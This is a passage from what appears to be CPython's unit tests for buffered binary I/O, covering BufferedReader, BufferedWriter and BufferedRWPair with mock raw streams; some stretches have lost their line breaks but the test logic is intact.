        # Silence destructor error
        b.flush = lambda: None
        raw.close = lambda: None

    def test_multi_close(self):
        # Repeated close() calls are no-ops; later use raises ValueError.
        raw = self.MockRawIO()
        b = self.tp(raw)
        b.close()
        b.close()
        b.close()
        self.assertRaises(ValueError, b.flush)

    def test_unseekable(self):
        # tell()/seek() through a buffered wrapper of an unseekable raw
        # stream must raise UnsupportedOperation.
        bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
        self.assertRaises(self.UnsupportedOperation, bufio.tell)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)

    def test_readonly_attributes(self):
        raw = self.MockRawIO()
        buf = self.tp(raw)
        x =
self.MockRawIO() with self.assertRaises(AttributeError): buf.raw = x class SizeofTest: @support.cpython_only def test_sizeof(self): bufsize1 = 4096 bufsize2 = 8192 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize1) size = sys.getsizeof(bufio) - bufsize1 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize2) self.assertEqual(sys.getsizeof(bufio), size + bufsize2) @support.cpython_only def test_buffer_freeing(self) : bufsize = 4096 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize) size = sys.getsizeof(bufio) - bufsize bufio.close() self.assertEqual(sys.getsizeof(bufio), size) class BufferedReaderTest(unittest.TestCase, CommonBufferedTests): read_mode = "rb" def test_constructor(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(b"abc", bufio.read()) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) rawio = self.MockRawIO([b"abc"]) bufio.__init__(rawio) self.assertEqual(b"abc", bufio.read()) def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.read, 0) bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.read(0), b'') def test_read(self): for arg in (None, 7): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(arg)) # Invalid args self.assertRaises(ValueError, bufio.read, -2) def test_read1(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"b", bufio.read1(1)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"", bufio.read1(0)) 
        # Remaining buffered byte is served without a new raw read.
        self.assertEqual(b"c", bufio.read1(100))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"d", bufio.read1(100))
        self.assertEqual(rawio._reads, 2)
        self.assertEqual(b"efg", bufio.read1(100))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1(100))
        self.assertEqual(rawio._reads, 4)

    def test_read1_arbitrary(self):
        # read1() with no argument (or -1) returns the buffered data plus at
        # most one raw read's worth of bytes.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"a", bufio.read(1))
        self.assertEqual(b"bc", bufio.read1())
        self.assertEqual(b"d", bufio.read1())
        self.assertEqual(b"efg", bufio.read1(-1))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1())
        self.assertEqual(rawio._reads, 4)

    def test_readinto(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        b = bytearray(2)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"cd")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ef")
        # Only one byte left: the unread tail of b keeps its previous data.
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"gf")
        self.assertEqual(bufio.readinto(b), 0)
        self.assertEqual(b, b"gf")
        # A None from the raw stream (would-block) stops the fill early.
        rawio = self.MockRawIO((b"abc", None))
        bufio = self.tp(rawio)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"cb")

    def test_readinto1(self):
        buffer_size = 10
        rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
        bufio = self.tp(rawio, buffer_size=buffer_size)
        b = bytearray(2)
        # peek() fills the buffer; readinto1() drains it without new reads.
        self.assertEqual(bufio.peek(3), b'abc')
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 1)
        self.assertEqual(b[:1], b"c")
        self.assertEqual(rawio._reads, 1)
        # Buffer empty: readinto1() performs at most one raw read.
        self.assertEqual(bufio.readinto1(b), 2)
        self.assertEqual(b, b"de")
        self.assertEqual(rawio._reads, 2)
        b = bytearray(2*buffer_size)
        self.assertEqual(bufio.peek(3), b'fgh')
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl") self.assertEqual(rawio._reads, 4) def test_readinto_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readinto1_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto1(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readlines(self): def bufio(): rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef")) return self.tp(rawio) self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"]) self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"]) self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"]) def test_buffering(self): data = b"abcdefghi" dlen = len(data) tests = [ [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ], [ 100, [ 3, 3, 3], [ dlen ] ], [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ], ] for bufsize, buf_read_sizes, raw_read_sizes in tests: rawio = self.MockFileIO(data) bufio = self.tp(rawio, buffer_size=bufsize) pos = 0 for nbytes in buf_read_sizes: self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes]) pos += nbytes # this is mildly 
            # implementation-dependent
            self.assertEqual(rawio.read_history, raw_read_sizes)

    def test_read_non_blocking(self):
        # Inject some None's in there to simulate EWOULDBLOCK
        rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcd", bufio.read(6))
        self.assertEqual(b"e", bufio.read(1))
        self.assertEqual(b"fg", bufio.read())
        self.assertEqual(b"", bufio.peek(1))
        self.assertIsNone(bufio.read())  # would-block propagates as None
        self.assertEqual(b"", bufio.read())

        rawio = self.MockRawIO((b"a", None, None))
        self.assertEqual(b"a", rawio.readall())
        self.assertIsNone(rawio.readall())

    def test_read_past_eof(self):
        # Asking for more than is available just returns what exists.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read(9000))

    def test_read_all(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read())

    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes with exactly the same number of 0's,
            # 1's... 255's. This will help us check that concurrent reading
            # doesn't duplicate or forget contents.
N = 1000 l = list(range(256)) * N random.shuffle(l) s = bytes(bytearray(l)) with self.open(os_helper.TESTFN, "wb") as f: f.write(s) with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] results = [] def f(): try: # Intra-buffer read then buffer-flushing read for n in cycle([1, 19]): s = bufio.read(n) if not s: break # list.append() is atomic results.append(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) s = b''.join(results) for i in range(256): c = bytes(bytearray([i])) self.assertEqual(s.count(c), N) finally: os_helper.unlink(os_helper.TESTFN) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) bufio.read(1) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) self.assertRaises(self.UnsupportedOperation, bufio.tell) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) # Silence destructor error bufio.close = lambda: None def test_no_extraneous_read(self): # Issue #9550; when the raw IO object has satisfied the read request, # we should not issue any additional reads, otherwise it may block # (e.g. socket). bufsize = 16 for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2): rawio = self.MockRawIO([b"x" * n]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) # Simple case: one raw read is enough to satisfy the request. self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) # A more complex case where two raw reads are needed to satisfy # the request. 
rawio = self.MockRawIO([b"x" * (n - 1), b"x"]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) def test_read_on_closed(self): # Issue #23796 b = io.BufferedReader(io.BytesIO(b"12")) b.read(1) b.close() self.assertRaises(ValueError, b.peek) self.assertRaises(ValueError, b.read1, 1) def test_truncate_on_read_only(self): rawio = self.MockFileIO(b"abc") bufio = self.tp(rawio) self.assertFalse(bufio.writable()) self.assertRaises(self.UnsupportedOperation, bufio.truncate) self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0) class CBufferedReaderTest(BufferedReaderTest, SizeofTest): tp = io.BufferedReader @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedReaderTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.read) def test_misbehaved_io_read(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) # _pyio.BufferedReader seems to implement reading different, so that # checking this is not so easy. self.assertRaises(OSError, bufio.read, 10) def test_garbage_collection(self): # C BufferedReader objects are collected. 
# The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(os_helper.unlink, os_helper.TESTFN) with warnings_helper.check_warnings(('', ResourceWarning)): rawio = self.FileIO(os_helper.TESTFN, "w+b") f = self.tp(rawio) f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedReader"): self.tp(io.BytesIO(), 1024, 1024, 1024) def test_bad_readinto_value(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: -1 bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsNone(cm.exception.__cause__) def test_bad_readinto_type(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: b'' bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsInstance(cm.exception.__cause__, TypeError) class PyBufferedReaderTest(BufferedReaderTest): tp = pyio.BufferedReader class BufferedWriterTest(unittest.TestCase, CommonBufferedTests): write_mode = "wb" def test_constructor(self): rawio = self.MockRawIO() bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(3, bufio.write(b"abc")) bufio.flush() self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) bufio.__init__(rawio) self.assertEqual(3, bufio.write(b"ghi")) bufio.flush() self.assertEqual(b"".join(rawio._write_stack), b"abcghi") def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.write, b'') bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.write(b''), 0) def test_detach_flush(self): raw = 
            self.MockRawIO()
        # (continuation of test_detach_flush) detach() must flush buffered data.
        buf = self.tp(raw)
        buf.write(b"howdy!")
        self.assertFalse(raw._write_stack)
        buf.detach()
        self.assertEqual(raw._write_stack, [b"howdy!"])

    def test_write(self):
        # Write to the buffered IO but don't overflow the buffer.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        self.assertFalse(writer._write_stack)
        buffer = bytearray(b"def")
        bufio.write(buffer)
        buffer[:] = b"***"  # Overwrite our copy of the data
        bufio.flush()
        self.assertEqual(b"".join(writer._write_stack), b"abcdef")

    def test_write_overflow(self):
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        contents = b"abcdefghijklmnop"
        for n in range(0, len(contents), 3):
            bufio.write(contents[n:n+3])
        flushed = b"".join(writer._write_stack)
        # At least (total - 8) bytes were implicitly flushed, perhaps more
        # depending on the implementation.
        self.assertTrue(flushed.startswith(contents[:-8]), flushed)

    def check_writes(self, intermediate_func):
        # Lots of writes, test the flushed output is as expected.
        # intermediate_func is called between writes to interleave other ops.
        contents = bytes(range(256)) * 1000
        n = 0
        writer = self.MockRawIO()
        bufio = self.tp(writer, 13)
        # Generator of write sizes: repeat each N 15 times then proceed to N+1
        def gen_sizes():
            for size in count(1):
                for i in range(15):
                    yield size
        sizes = gen_sizes()
        while n < len(contents):
            size = min(next(sizes), len(contents) - n)
            self.assertEqual(bufio.write(contents[n:n+size]), size)
            intermediate_func(bufio)
            n += size
        bufio.flush()
        self.assertEqual(contents, b"".join(writer._write_stack))

    def test_writes(self):
        self.check_writes(lambda bufio: None)

    def test_writes_and_flushes(self):
        self.check_writes(lambda bufio: bufio.flush())

    def test_writes_and_seeks(self):
        # Seeks interleaved with writes must not corrupt the output.
        def _seekabs(bufio):
            pos = bufio.tell()
            bufio.seek(pos + 1, 0)
            bufio.seek(pos - 1, 0)
            bufio.seek(pos, 0)
        self.check_writes(_seekabs)
        def _seekrel(bufio):
            pos = bufio.seek(0, 1)
            bufio.seek(+1, 1)
            bufio.seek(-1, 1)
            bufio.seek(pos, 0)
        self.check_writes(_seekrel)

    def test_writes_and_truncates(self):
        self.check_writes(lambda bufio:
                          bufio.truncate(bufio.tell()))

    def test_write_non_blocking(self):
        # A partially-blocking raw stream: write() buffers what it can and
        # raises BlockingIOError (with characters_written set) when full.
        raw = self.MockNonBlockWriterIO()
        bufio = self.tp(raw, 8)

        self.assertEqual(bufio.write(b"abcd"), 4)
        self.assertEqual(bufio.write(b"efghi"), 5)
        # 1 byte will be written, the rest will be buffered
        raw.block_on(b"k")
        self.assertEqual(bufio.write(b"jklmn"), 5)

        # 8 bytes will be written, 8 will be buffered and the rest will be lost
        raw.block_on(b"0")
        try:
            bufio.write(b"opqrwxyz0123456789")
        except self.BlockingIOError as e:
            written = e.characters_written
        else:
            self.fail("BlockingIOError should have been raised")
        self.assertEqual(written, 16)
        self.assertEqual(raw.pop_written(),
                         b"abcdefghijklmnopqrwxyz")

        self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
        s = raw.pop_written()
        # Previously buffered bytes were flushed
        self.assertTrue(s.startswith(b"01234567A"), s)

    def test_write_and_rewind(self):
        raw = io.BytesIO()
        bufio = self.tp(raw, 4)
        self.assertEqual(bufio.write(b"abcdef"), 6)
        self.assertEqual(bufio.tell(), 6)
        bufio.seek(0, 0)
        self.assertEqual(bufio.write(b"XY"), 2)
        bufio.seek(6, 0)
        self.assertEqual(raw.getvalue(), b"XYcdef")
        self.assertEqual(bufio.write(b"123456"), 6)
        bufio.flush()
        self.assertEqual(raw.getvalue(), b"XYcdef123456")

    def test_flush(self):
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        bufio.flush()
        self.assertEqual(b"abc", writer._write_stack[0])

    def test_writelines(self):
        l = [b'ab', b'cd', b'ef']
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.writelines(l)
        bufio.flush()
        self.assertEqual(b''.join(writer._write_stack), b'abcdef')

    def test_writelines_userlist(self):
        # writelines() must accept any iterable of bytes, not just list.
        l = UserList([b'ab', b'cd', b'ef'])
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.writelines(l)
        bufio.flush()
        self.assertEqual(b''.join(writer._write_stack), b'abcdef')

    def test_writelines_error(self):
        # Non-bytes items (and non-iterables) must raise TypeError.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
        self.assertRaises(TypeError, bufio.writelines, None)
        self.assertRaises(TypeError, bufio.writelines, 'abc')

    def test_destructor(self):
        # Dropping the last reference must flush buffered data to the raw
        # stream.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        del bufio
        support.gc_collect()
        self.assertEqual(b"abc", writer._write_stack[0])

    def test_truncate(self):
        # Truncate implicitly flushes the buffer.
        self.addCleanup(os_helper.unlink, os_helper.TESTFN)
        with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
            bufio = self.tp(raw, 8)
            bufio.write(b"abcdef")
            self.assertEqual(bufio.truncate(3), 3)
            self.assertEqual(bufio.tell(), 6)
        with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
            self.assertEqual(f.read(), b"abc")

    def test_truncate_after_write(self):
        # Ensure that truncate preserves the file position after
        # writes longer than the buffer size.
        # Issue: https://bugs.python.org/issue32228
        self.addCleanup(os_helper.unlink, os_helper.TESTFN)
        with self.open(os_helper.TESTFN, "wb") as f:
            # Fill with some buffer
            f.write(b'\x00' * 10000)
        buffer_sizes = [8192, 4096, 200]
        for buffer_size in buffer_sizes:
            with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
                f.write(b'\x00' * (buffer_size + 1))
                # After write write_pos and write_end are set to 0
                f.read(1)
                # read operation makes sure that pos != raw_pos
                f.truncate()
                self.assertEqual(f.tell(), buffer_size + 2)

    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes from many threads and test they were
            # all flushed.
            N = 1000
            contents = bytes(range(256)) * N
            sizes = cycle([1, 19])
            n = 0
            queue = deque()
            while n < len(contents):
                size = next(sizes)
                queue.append(contents[n:n+size])
                n += size
            del contents
            # We use a real file object because it allows us to
            # exercise situations where the GIL is released before
            # writing the buffer to the raw streams. This is in addition
            # to concurrency issues due to switching threads in the middle
            # of Python code.
            # (continuation of test_threads) 20 threads drain a shared deque,
            # each writing its chunks through one BufferedWriter; the flushed
            # file must contain every byte exactly once.
            with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                def f():
                    try:
                        while True:
                            try:
                                s = queue.popleft()
                            except IndexError:
                                return
                            bufio.write(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                with threading_helper.start_threads(threads):
                    time.sleep(0.02)  # yield
                self.assertFalse(errors,
                    "the following exceptions were caught: %r" % errors)
                bufio.close()
            with self.open(os_helper.TESTFN, "rb") as f:
                s = f.read()
            for i in range(256):
                self.assertEqual(s.count(bytes([i])), N)
        finally:
            os_helper.unlink(os_helper.TESTFN)

    def test_misbehaved_io(self):
        rawio = self.MisbehavedRawIO()
        bufio = self.tp(rawio, 5)
        self.assertRaises(OSError, bufio.seek, 0)
        self.assertRaises(OSError, bufio.tell)
        self.assertRaises(OSError, bufio.write, b"abcdef")
        # Silence destructor error
        bufio.close = lambda: None

    def test_max_buffer_size_removal(self):
        # The legacy max_buffer_size third argument was removed.
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), 8, 12)

    def test_write_error_on_close(self):
        raw = self.MockRawIO()
        def bad_write(b):
            raise OSError()
        raw.write = bad_write
        b = self.tp(raw)
        b.write(b'spam')
        self.assertRaises(OSError, b.close)  # exception not swallowed
        self.assertTrue(b.closed)

    def test_slow_close_from_thread(self):
        # Issue #31976
        rawio = self.SlowFlushRawIO()
        bufio = self.tp(rawio, 8)
        t = threading.Thread(target=bufio.close)
        t.start()
        rawio.in_flush.wait()
        self.assertRaises(ValueError, bufio.write, b'spam')
        self.assertTrue(bufio.closed)
        t.join()


class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
    # Runs the shared BufferedWriterTest suite against the C implementation.
    tp = io.BufferedWriter

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedWriterTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # Invalid buffer sizes leave the object unusable: write() raises too.
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.write, b"def")

    def test_garbage_collection(self):
        # C BufferedWriter objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends into gc.garbage instead
        self.addCleanup(os_helper.unlink, os_helper.TESTFN)
        with warnings_helper.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(os_helper.TESTFN, "w+b")
            f = self.tp(rawio)
            f.write(b"123xxx")
            f.x = f  # reference cycle: only cyclic GC can reclaim it
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(os_helper.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"123xxx")

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedWriter"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)


class PyBufferedWriterTest(BufferedWriterTest):
    # Runs the shared suite against the pure-Python implementation.
    tp = pyio.BufferedWriter


class BufferedRWPairTest(unittest.TestCase):

    def test_constructor(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)

    def test_uninitialized(self):
        pair = self.tp.__new__(self.tp)
        del pair
        pair = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.read, 0)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.write, b'')
        pair.__init__(self.MockRawIO(), self.MockRawIO())
        self.assertEqual(pair.read(0), b'')
        self.assertEqual(pair.write(b''), 0)

    def test_detach(self):
        pair =
            self.tp(self.MockRawIO(), self.MockRawIO())
        # (continuation of test_detach) a pair has no single underlying raw
        # stream, so detach() is unsupported.
        self.assertRaises(self.UnsupportedOperation, pair.detach)

    def test_constructor_max_buffer_size_removal(self):
        # The legacy max_buffer_size fourth argument was removed.
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)

    def test_constructor_with_not_readable(self):
        class NotReadable(MockRawIO):
            def readable(self):
                return False

        self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())

    def test_constructor_with_not_writeable(self):
        class NotWriteable(MockRawIO):
            def writable(self):
                return False

        self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())

    def test_read(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

        self.assertEqual(pair.read(3), b"abc")
        self.assertEqual(pair.read(1), b"d")
        self.assertEqual(pair.read(), b"ef")
        pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
        self.assertEqual(pair.read(None), b"abc")

    def test_readlines(self):
        pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])

    def test_read1(self):
        # .read1() is delegated to the underlying reader object, so this test
        # can be shallow.
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

        self.assertEqual(pair.read1(3), b"abc")
        self.assertEqual(pair.read1(), b"def")

    def test_readinto(self):
        for method in ("readinto", "readinto1"):
            with self.subTest(method):
                pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

                data = byteslike(b'\0' * 5)
                self.assertEqual(getattr(pair, method)(data), 5)
                self.assertEqual(bytes(data), b"abcde")

    def test_write(self):
        w = self.MockRawIO()
        pair = self.tp(self.MockRawIO(), w)

        pair.write(b"abc")
        pair.flush()
        buffer = bytearray(b"def")
        pair.write(buffer)
        buffer[:] = b"***"  # Overwrite our copy of the data
        pair.flush()
        self.assertEqual(w._write_stack, [b"abc", b"def"])

    def test_peek(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())

        self.assertTrue(pair.peek(3).startswith(b"abc"))
        self.assertEqual(pair.read(3), b"abc")

    def test_readable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.readable())

    def test_writeable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.writable())

    def test_seekable(self):
        # BufferedRWPairs are never seekable, even if their readers and writers
        # are.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.seekable())

    # .flush() is delegated to the underlying writer object and has been
    # tested in the test_write method.
    def test_close_and_closed(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)
        pair.close()
        self.assertTrue(pair.closed)

    def test_reader_close_error_on_close(self):
        # If closing the reader fails, the writer must still be closed and
        # the pair marked closed, while the error propagates.
        def reader_close():
            reader_non_existing  # deliberate NameError inside close()
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertTrue(pair.closed)
        self.assertFalse(reader.closed)
        self.assertTrue(writer.closed)

        # Silence destructor error
        reader.close = lambda: None

    def test_writer_close_error_on_close(self):
        # If closing the writer fails, the reader is still closed but the
        # pair stays "open" and the error propagates.
        def writer_close():
            writer_non_existing  # deliberate NameError inside close()
        reader = self.MockRawIO()
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('writer_non_existing', str(err.exception))
        self.assertFalse(pair.closed)
        self.assertTrue(reader.closed)
        self.assertFalse(writer.closed)

        # Silence destructor error
        writer.close = lambda: None
        writer = None

        # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
        with support.catch_unraisable_exception():
            # Ignore BufferedRWPair unraisable exception
            with support.catch_unraisable_exception():
                pair = None
                support.gc_collect()
            support.gc_collect()

    def test_reader_writer_close_error_on_close(self):
        # Both close() calls fail: the reader's error is raised, chained
        # (__context__) onto the writer's error.
        def reader_close():
            reader_non_existing  # deliberate NameError inside close()
        def writer_close():
            writer_non_existing  # deliberate NameError inside close()
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
